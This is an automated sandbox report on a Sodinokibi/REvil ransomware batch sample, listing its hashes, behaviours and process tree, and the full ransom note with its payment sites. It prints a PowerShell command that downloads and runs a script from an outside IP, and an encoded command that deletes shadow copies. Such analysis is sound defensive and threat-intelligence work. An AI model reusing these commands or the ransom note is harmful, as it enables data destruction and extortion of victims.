Analysis

  • max time kernel
    136s
  • max time network
    156s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    09-08-2020 06:10

General

  • Target

    0cc92ed976f20bbf302be1a39d209cfb.bat

  • Size

    215B

  • MD5

    5a017babe92c5caf427346c46b48b015

  • SHA1

    2958eaeeb470d273b70d1528c0e78b33de585b8c

  • SHA256

    02a0406ce3e4a1076e67011128e0f0ea53e4c1ab7826a25e0215c8418960563e

  • SHA512

    8406dd4b30b5f549321ee69c640c3ddb93cdf3213075ddd8f283698129b39a1ae09e08cceea0a508aaa2a600b96f7e491331edd63e8f2309563bebc386ef6ece

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/0cc92ed976f20bbf302be1a39d209cfb

Extracted

Path

C:\qumn6-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension qumn6. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FD8962F599EA2046 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/FD8962F599EA2046 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: xHJUo+qAJpQVJdmUMdWhJkZ0ayBDRhQEm/mf0FaNz8hbNloRyo1nGMfXhTikIl8D QAxOKoazUd4j5fpo9VBS48mJwHqc2xbV6j/MVpPIfuUi9ddiVri+4NPMPIH9IVKF Iwl0PI4j7Ny3wkVzDJfRTquMKUCwQogjXKWnp9xqYLfeaijPAu4h2Yap8I+4K7A1 zz5ckJf+15HHVQdrvqbX+ziETsxJPPToIK1ZMN6g5l5N7lKF7W9Kr96QvHQbwYm4 myS/X3kPnB3SjrVvJaKChiHWl4xZLE8ojTx8LaywCK7kCAbUjl3WVVO+ZkIYIHhq ABE/yfwvb1q2H3ay3dEkrmRkkjKxWf+vuU5iKxufJT2CNc0y8AZScXva/i+/4mvC IRp2RgX/cO6XxNBgm22ruxSqUF1rEJuOXsxPI/t4iBhlIO9QhViaXR2FUmGMaOsC oBv4Kb0I0e3ejTxsrOO3/jZ/RJ5zwS72Ln2F7nn4vpAlyKS0jilHkxAWHFDxOD3J y57f4b3J/b7258fBhpKI7mCNdtP7XYVepOUwbYQOmv0uFmRLHH0VXhWzl1Vj/WiR oAW4zW9ZLYk7rk0rxAukWkv+cGg1zxsp3SGReAB1yaCKEO30NmuarZ12tT4q0vbD quDQymxPGYffkoA4Js1RtHbN23vofHnPUsCDJO25c+84fZejwzflkYNYkHzp8hmx f4+/yLEoXytZB0u4DPyTL0MuUkKLytOhkB1UpoYMyKCPqjXbxhevzQit9z+eW/1F ouCr76A2Q2d1KX4p6Mg4JdQCNkwnBrJZFgEMFuk3Fc7wxT/FHLJWiW3x9VeS4Ex6 ywshbc7QXRO9/rlstCm118YOJOIhIKFiE7Y0mfRVLLeRBHb/oKFx6OH6IEoAAHt5 0EwYgfwu4f/p1RTNosiNg11fuiRl55sycmZf3GX4f4mGOLhK7fsG1giX8kzNmc/B jac2SNow+cCYR2qN45dk5/JUp3qcEbpk7QKV4k5H6AZYhzQw2Nq3IrzNNPf2Z4y9 8/IPoohapZnHOyeliLn7DXyEOE/eBhSHUCMIGieSH/6Lrw+qUHCK3R043TKGNXNW fvbzJBl8vkNMV5Z1cGaEwthHlLpGzJsaeUgUVEE9jMmnkybTOKEnwT6wwuXXoVBi 2XM6VZYlA8VCFGt1lEFrgaLwNaWHUKZqa6qs9xju+ZKbKosAIFzLyLXITBdgIhOX Zz8zVE51JS7twC4nLlcoq4FJs8FE4RvYATfp3yzEqaPFr88xeTcAm7smcxYmQUcr 41r1vOqG8rVZVN057wwG00+4GQ23MACo6yZ4Ffyo ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FD8962F599EA2046

http://decryptor.cc/FD8962F599EA2046

Signatures

  • Modifies system certificate store 2 TTPs 10 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 28 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
  • Modifies extensions of user files 8 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 182 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\0cc92ed976f20bbf302be1a39d209cfb.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:316
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/0cc92ed976f20bbf302be1a39d209cfb');Invoke-JNLSXVWQ;Start-Sleep -s 10000"
      2⤵
      • Modifies system certificate store
      • Drops file in System32 directory
      • Drops file in Program Files directory
      • Suspicious use of WriteProcessMemory
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Sets desktop wallpaper using registry
      • Modifies extensions of user files
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      PID:1440
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1844
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1576

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9fa

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaeba

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

  • memory/1440-5-0x0000000005240000-0x0000000005241000-memory.dmp

    Filesize

    4KB

  • memory/1440-21-0x0000000005860000-0x0000000005861000-memory.dmp

    Filesize

    4KB

  • memory/1440-22-0x00000000062C0000-0x00000000062C1000-memory.dmp

    Filesize

    4KB

  • memory/1440-14-0x0000000006220000-0x0000000006221000-memory.dmp

    Filesize

    4KB

  • memory/1440-13-0x00000000056F0000-0x00000000056F1000-memory.dmp

    Filesize

    4KB

  • memory/1440-8-0x0000000005640000-0x0000000005641000-memory.dmp

    Filesize

    4KB

  • memory/1440-0-0x0000000000000000-mapping.dmp

  • memory/1440-4-0x0000000001250000-0x0000000001251000-memory.dmp

    Filesize

    4KB

  • memory/1440-3-0x0000000004700000-0x0000000004701000-memory.dmp

    Filesize

    4KB

  • memory/1440-2-0x0000000000C30000-0x0000000000C31000-memory.dmp

    Filesize

    4KB

  • memory/1440-1-0x0000000074630000-0x0000000074D1E000-memory.dmp

    Filesize

    6.9MB

  • memory/1844-23-0x0000000000000000-mapping.dmp

  • memory/1844-25-0x0000000074630000-0x0000000074D1E000-memory.dmp

    Filesize

    6.9MB